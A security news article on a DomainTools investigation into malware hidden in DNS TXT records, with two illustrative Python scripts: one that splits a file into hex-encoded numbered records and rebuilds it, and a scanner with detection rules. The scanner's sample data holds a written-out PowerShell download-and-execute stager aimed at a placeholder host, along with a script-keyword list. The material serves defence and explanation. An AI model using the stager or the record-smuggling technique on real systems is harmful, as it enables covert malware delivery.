Researchers at DomainTools have documented how DNS TXT records are abused to store and distribute malicious content, including fragments of executable files and encoded commands tied to command-and-control infrastructure.
A recent investigation by the DomainTools team revealed a sophisticated method used by malicious actors to hide and propagate malware through DNS TXT records. The technique is not theoretical: it was identified on at least three domains between 2021 and 2022. It lets attackers stash fragments of executable files, and even attack scripts, in the TXT records of subdomains without raising suspicion.
The DNS, one of the Internet's pillars, works like a digital "phone book" that translates domain names into IP addresses. TXT records were originally meant to hold free-form text associated with a name, and today they routinely carry domain-ownership verification tokens and email authentication policies (SPF, DKIM, DMARC). Because a resolver returns whatever text the zone owner publishes, they have also become a convenient storage medium for cybercrime.
How this type of attack works
The discovered method begins with splitting a file (such as an image or an executable) into chunks and encoding each chunk as hexadecimal. The chunks are stored in TXT records across many subdomains of a parent domain, for example *.felix.stf.whitetreecollective[.]com, one of the investigated domains. Thanks to this fragmentation, a complete file (e.g., an .exe) can be hidden across hundreds of sequentially numbered subdomains, with each TXT record holding only a small slice.
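As an added illustration (not code from the DomainTools report or its tooling), the Python script below shows both halves of the technique described above: an attacker-side fragment() that hex-encodes a file into numbered TXT records, and a defender-side reassemble() that walks 0.<base>, 1.<base>, ... until a name returns no TXT data. The resolver is a constructed in-memory dictionary, the sample file is a constructed MZ-headed blob rather than one of the reported executables, and felix.stf.example.test is a hypothetical name, so nothing is queried over the network.

```python
import binascii
import hashlib
from typing import Callable

# Constructed sample "file": a PE-like blob that starts with the MZ magic.
# It stands in for the executables in the report; it is not one of them.
SAMPLE_FILE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + bytes(range(256)) * 2
    + b"This program cannot be run in DOS mode.\r\n$"
)

# Hypothetical base name for the numbered subdomains (not a domain from the report).
BASE = "felix.stf.example.test"

# A TXT record is made of strings of at most 255 bytes each, so one
# 120-byte chunk fits in a single 240-character hex string.
CHUNK_BYTES = 120


def fragment(data: bytes, base: str, chunk: int = CHUNK_BYTES) -> dict[str, list[str]]:
    """Attacker side: hex-encode the file and spread it over N.<base> TXT records."""
    zone = {}
    for n, off in enumerate(range(0, len(data), chunk)):
        zone[f"{n}.{base}"] = [binascii.hexlify(data[off:off + chunk]).decode("ascii")]
    return zone


def reassemble(lookup: Callable[[str], list[str]], base: str) -> bytes:
    """Defender side: rebuild the file by walking 0.<base>, 1.<base>, ... in order.

    `lookup` resolves a name to its TXT strings (or None/[] if absent). Here it
    is backed by a dict; in a real investigation it would be a passive-DNS query.
    """
    out = bytearray()
    n = 0
    while True:
        strings = lookup(f"{n}.{base}")
        if not strings:
            break
        # One TXT record may be split into several strings; join before decoding.
        blob = "".join(strings)
        try:
            out += binascii.unhexlify(blob)
        except binascii.Error as exc:
            raise ValueError(f"record {n}.{base} is not valid hex: {exc}") from exc
        n += 1
    if n == 0:
        raise ValueError(f"no TXT records found under {base}")
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """Cheap triage: Windows executables start with the 'MZ' DOS header magic."""
    return data[:2] == b"MZ"


def demo() -> dict:
    """Fragment the sample, recover it through the fake resolver, and summarise."""
    zone = fragment(SAMPLE_FILE, BASE)
    recovered = reassemble(lambda name: zone.get(name, []), BASE)
    return {
        "records": len(zone),
        "intact": recovered == SAMPLE_FILE,
        "pe_magic": looks_like_pe(recovered),
        "sha256": hashlib.sha256(recovered).hexdigest(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

To use this against live data, replace the lambda with a function that queries passive DNS (or a resolver) for TXT records, then hash the recovered bytes and compare them with the SHA256 values the report lists. Stopping at the first missing index is deliberate: a gap usually means the zone has been partially cleaned up, and a silent skip would hand you a file that no longer matches any known hash.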
Using an AI-generated script, the researchers reconstructed the stored files from the DNS records. The recovered files were two executables with the following SHA256 hashes:
7ff0ecf2953b8662ede1577e330a514f09992c18aa3c14ed77cf2ffc115b0866
e7b22ba761a7f853b63933ffe517cc61596710dbdee992a429ac1bc8d04186a1
Both were classified as Joke Screenmate, a family of prank software that displays fake error messages, fills the screen with animated characters, interferes with mouse control and degrades system performance. While such programs may seem harmless or humorous at first, they can serve as a distraction for other malicious activity or significantly impair the user experience.
Beyond a prank: embedded malicious commands
The DomainTools report also documented a more dangerous use: storing encoded commands, such as PowerShell scripts that connect to command-and-control (C2) servers. For instance, a script found in a TXT record associated with drsmitty[.]com acted as a stager that downloaded a payload from another domain, cspg[.]pw, specifically from the path /api/v1/nps/payload/stage1. That URL path is consistent with the Covenant C2 framework, a post-exploitation platform popular in penetration testing and also used by malicious actors.
Storing a script in a DNS record does not by itself execute anything; something on the victim's system still has to query the record and run the content. Nonetheless, this storage method can evade traditional detection tools, especially when combined with social engineering or with malware already present on the host.
Why is this technique concerning?
- Persistence without external intervention: DNS records can remain published for long periods if nobody monitors or changes them, keeping the hidden files available for reconstruction.
- Detection difficulty: DNS is a protocol every host is expected to use, so many security controls allow it by default and never inspect the content of TXT responses.
- Reduced reliance on visible malicious servers: instead of hosting malware on a compromised web server, all of the content can be served from seemingly legitimate domain infrastructure.
A challenge for defenders
This case highlights how attackers continue exploring creative and alternative methods to evade traditional defenses. Using DNS as a malware distribution channel isn’t new, but the level of sophistication and automation observed here is alarming.
Defenders increasingly need to monitor not just which names are queried but what the answers contain. Tools like DNSDB Scout, used in this investigation, let analysts search passive DNS data and look for suspicious patterns, such as hexadecimal-encoded file headers or large numbers of numbered subdomains under one parent.
Cybersecurity teams should incorporate DNS record analysis into their threat intelligence workflows and develop detection rules that flag anomalies such as frequent queries to numeric subdomains or unusually long TXT records.
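As an added example (not part of the DomainTools report or its tooling), the Python below applies the detection heuristics just described to a constructed set of passive-DNS TXT records: it flags values that are unusually long, values that are one continuous hex or base64 blob, decoded blobs that start with a known file header or contain script keywords, and numeric leftmost labels that have several numbered siblings under the same parent. The domains, payloads, keyword list and the LONG_TXT threshold are all assumptions made for this example.

```python
import base64
import binascii
import re
from collections import defaultdict

# File headers worth flagging when a decoded TXT blob starts with one of them.
FILE_MAGIC = {
    b"MZ": "pe-exe",
    b"\x7fELF": "elf",
    b"\x89PNG": "png",
    b"PK\x03\x04": "zip",
    b"%PDF": "pdf",
}
# Strings that suggest a decoded blob is a command rather than a file (assumed list).
SCRIPT_KEYWORDS = [b"powershell", b"iex", b"downloadstring", b"cmd.exe", b"/bin/sh", b"http://", b"https://"]
HEX_RE = re.compile(r"[0-9a-fA-F]{32,}")
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
LONG_TXT = 200  # assumed threshold; tune it against your own zone data


def _hex(raw: bytes) -> str:
    return binascii.hexlify(raw).decode("ascii")


# Constructed passive-DNS sample as (name, TXT rdata). Every record here is
# made up for this example; the domains and payloads are not from the report.
SAMPLE_RECORDS = [
    ("corp.test", "v=spf1 include:_spf.example.net -all"),
    ("_dmarc.corp.test", "v=DMARC1; p=reject; rua=mailto:dmarc@corp.test"),
    ("corp.test", "google-site-verification=abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHI"),
    ("selector1._domainkey.corp.test", "v=DKIM1; k=rsa; p=" + "A" * 300),  # long but legitimate
    ("0.felix.stf.malware.test", _hex(b"MZ\x90\x00" + bytes(116))),
    ("1.felix.stf.malware.test", _hex(bytes(range(120)))),
    ("2.felix.stf.malware.test", _hex(bytes(range(120, 240)))),
    ("3.felix.stf.malware.test", _hex(b"This program cannot be run in DOS mode.")),
    ("cmd.staging.malware.test", _hex(
        b"powershell -nop -w hidden -c IEX((New-Object Net.WebClient)"
        b".DownloadString('http://stage.malware.test/api/v1/nps/payload/stage1'))")),
]


def decode_blob(txt: str):
    """Return (encoding, bytes) if the whole value is one hex or base64 blob, else (None, None)."""
    s = txt.replace(" ", "")
    if HEX_RE.fullmatch(s) and len(s) % 2 == 0:
        return "hex", binascii.unhexlify(s)
    if B64_RE.fullmatch(s):
        try:
            return "base64", base64.b64decode(s, validate=True)
        except binascii.Error:
            pass
    return None, None


def txt_reasons(name: str, txt: str, numeric_siblings: dict) -> list:
    """Heuristics for a single record; returns the list of rule names that fired."""
    reasons = []
    if len(txt) >= LONG_TXT:
        reasons.append("long-txt")
    enc, blob = decode_blob(txt)
    if enc:
        reasons.append(f"{enc}-blob")
        for magic, kind in FILE_MAGIC.items():
            if blob.startswith(magic):
                reasons.append(f"file-magic:{kind}")
        lowered = blob.lower()
        reasons += [f"script-keyword:{kw.decode()}" for kw in SCRIPT_KEYWORDS if kw in lowered]
    label, _, parent = name.partition(".")
    if label.isdigit() and len(numeric_siblings.get(parent, ())) >= 3:
        reasons.append(f"numeric-sequence:{len(numeric_siblings[parent])}")
    return reasons


def scan(records) -> list:
    """Run the heuristics over (name, txt) pairs and return the records with at least one hit."""
    numeric_siblings = defaultdict(set)  # parent -> set of numeric leftmost labels seen
    for name, _ in records:
        label, _, parent = name.partition(".")
        if label.isdigit():
            numeric_siblings[parent].add(label)
    findings = []
    for name, txt in records:
        reasons = txt_reasons(name, txt, numeric_siblings)
        if reasons:
            findings.append({"name": name, "txt_len": len(txt), "reasons": reasons})
    return findings


def reasons_by_name(records) -> dict:
    """Convenience view: flagged name -> list of rule names."""
    return {hit["name"]: hit["reasons"] for hit in scan(records)}


if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(hit["name"], hit["txt_len"], ", ".join(hit["reasons"]))
```

Length alone is noisy: the DKIM record trips only "long-txt", which is why the rules are reported separately and an alert should require at least one content-based hit (a decodable blob with a file header or script keyword) or the numbered-sibling pattern before anyone is paged.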
Conclusion
Between 2021 and 2022, at least one malicious actor used DNS as a platform to store and distribute malware, leveraging TXT records to hide everything from prank software to scripts linked to command-and-control servers. Although not entirely new, these quiet techniques underline the importance of ongoing vigilance and of looking more closely at network services traditionally treated as neutral.
Malware no longer travels solely via email attachments or malicious links; it can hide in the most unexpected corners of Internet infrastructure. Experts warn this might only be the beginning.
via: dti.domaintools.com